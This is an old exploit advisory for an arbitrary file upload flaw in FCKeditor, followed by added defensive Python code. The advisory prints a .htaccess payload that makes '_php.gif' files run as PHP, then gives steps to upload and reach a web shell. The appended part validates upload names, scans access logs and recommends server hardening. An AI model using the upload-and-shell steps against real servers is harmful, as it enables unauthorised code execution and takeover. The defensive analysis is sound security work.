FCKeditor arbitrary file upload vulnerability (all PHP versions)
Author: anonymous   Source: compiled by this site   Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is automatically changed to "shell_php.gif".
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now reachable on the server.
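A defensive counterpart to the steps above, added here as example code that is not part of the advisory: an upload-name check that rejects both the dotfile and the renamed `_php.gif` form that FCKeditor's rename still leaves executable, plus a scan of Apache access-log lines for the resulting traffic. It assumes Apache with mod_php; the log lines, paths and the `reject_reason`/`flag_log_lines` helpers are constructed for this example.

```python
import re

# Tokens that mod_php, or a SetHandler in an attacker-supplied .htaccess, can
# turn into executable code. Assumption: Apache with mod_php, as in the advisory.
EXEC_TOKENS = {"php", "php3", "php4", "php5", "phtml", "phar"}
# Server configuration files that must never be accepted as uploads.
CONFIG_NAMES = {".htaccess", ".htpasswd", "web.config"}


def reject_reason(filename):
    """Return why an upload name is unsafe, or None if it is acceptable.

    Renaming 'shell.php.gif' to 'shell_php.gif' is useless once a .htaccess
    maps '_php.gif' to the PHP handler, so the dotfile and every 'php' token
    (split on both '.' and '_') are rejected here."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name.startswith(".") or name in CONFIG_NAMES:
        return "server configuration or dotfile"
    tokens = [t for t in re.split(r"[._]", name) if t]
    if len(tokens) < 2:
        return "no extension"
    if any(t in EXEC_TOKENS for t in tokens):
        return "executable token in name"
    return None


# Combined-log request line: method, path, protocol, status.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# <FilesMatch "_php.gif"> is unanchored, so look for '_php' + an image
# extension anywhere in the path, and for any direct request of a .ht* file.
SUSPECT_RE = re.compile(r"_php\d?\.(gif|jpe?g|png)|/\.ht")


def flag_log_lines(lines):
    """Return the request paths that show the advisory's traffic pattern."""
    flagged = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and SUSPECT_RE.search(m.group("path").lower()):
            flagged.append(m.group("path"))
    return flagged


# Constructed sample access-log lines (not from the advisory); paths are illustrative.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Oct/2011:07:39:07 +0000] "POST /FCKeditor/connector/upload.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [25/Oct/2011:07:39:30 +0000] "GET /userfiles/.htaccess HTTP/1.1" 403 214',
    '10.0.0.5 - - [25/Oct/2011:07:40:01 +0000] "GET /userfiles/shell_php.gif HTTP/1.1" 200 1024',
    '10.0.0.9 - - [25/Oct/2011:07:41:11 +0000] "GET /userfiles/logo.gif HTTP/1.1" 200 8812',
]

if __name__ == "__main__":
    for name in (".htaccess", "shell.php.gif", "shell_php.gif", "photo.gif"):
        print(name, "->", reject_reason(name))
    print(flag_log_lines(SAMPLE_LOG))
```

The name check is only a backstop: the upload directory itself should be served with `AllowOverride None` and no script handler, so that an uploaded .htaccess has no effect even if one slips through.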